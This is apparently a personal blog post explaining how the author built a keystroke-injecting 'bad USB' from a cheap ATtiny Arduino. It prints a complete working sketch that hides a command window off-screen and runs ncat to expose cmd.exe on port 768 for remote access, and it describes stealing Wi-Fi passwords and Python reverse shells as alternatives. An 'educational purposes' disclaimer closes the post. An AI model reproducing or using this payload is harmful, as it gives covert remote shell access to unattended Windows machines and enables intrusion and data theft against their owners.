Usb thumb drives can be used by hackers to attack their target machines. The common term for such device is rubber ducky or bad usb. There are a few companies sell this kind of device and price range is between 2000 pesos to 6000 pesos. There are several ways to accomplish this and the simplest way is to use an arduino. There are many variants of arduino from small to ultra small like the femtoduino(the smallest arduino I think). To use this device hackers usually insert it on their target machine's usb port when no one else is watching and it only takes less that 10 seconds or sometimes 3 seconds.
The arduino can be programmed to mimmick a keyboard, which means that once inserted into a usb port, it will be recognize by the computer as a keyboard. And as we all know, Windows machines fully trust keyboards so it will allow it to run it without restriction. To prove this, I experimented with an ordinary USB memory stick by following this guide I found on youtube but even if I have turned of my anti virus, Windows doesnot trust it. So I did a little experiment if all of those people in youtube were saying was true and ordered immediately the cheapest arduino in shoppee(Attiny185 cost only 101 pesos plus 60 pesos delivery charge) and upon arriving, I uploaded the following program(they call it sketch in arduino world). As its price suggest, this bad usb that I used for my experiment is not as sophisticated as those being sold as bad usb in the market.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | #include "DigiKeyboard.h" #define KEY_DOWN 0x51 // Keyboard Down Arrow #define KEY_ENTER 0x28 //Return/Enter Key void setup() { pinMode(1, OUTPUT); //LED on Model A } void loop() { DigiKeyboard.update(); DigiKeyboard.sendKeyStroke(0); DigiKeyboard.delay(3000); DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run DigiKeyboard.delay(100); DigiKeyboard.println("cmd /k mode con: cols=15 lines=1"); //smallest cmd window possible DigiKeyboard.delay(500); DigiKeyboard.delay(500); DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_ALT_LEFT); //Menu DigiKeyboard.sendKeyStroke(KEY_M); //goto Move for(int i =0; i < 100; i++) { DigiKeyboard.sendKeyStroke(KEY_DOWN); } DigiKeyboard.sendKeyStroke(KEY_ENTER); //Detach from scrolling DigiKeyboard.delay(100); DigiKeyboard.println("ncat -lp 768 -vv -e cmd.exe"); DigiKeyboard.delay(90000); digitalWrite(1, LOW); DigiKeyboard.delay(5000); |
This program will open the command prompt window and drag it downward so that other people will not see it and create a reverse shell at port 768 if it is inserted on a windows machine.
And on my pc, I will just type "ncat <ip> 768".
My experiment was successful.
You may find the original program at github. This is where I got this idea from youtube.The orignal program was meant to steal wifi password and send it to the internet(webhook site). But it would take around 30 seconds to accomplish its task and may not work on other windows pc(it does not work on my Gole Mini Pc)while the program I uploaded would take less than 10 seconds and for sure if netcat is installed on that pc, it will work. If netcat is not installed but python is installed, a python program that creates a reverse shell can be used instead.
This is just for educational purposes only. You could go to jail if you use this to actually steal something or do something illegal. It is one of the tools used by hackers but also by ethical hackers and penetration testers.
No comments:
Post a Comment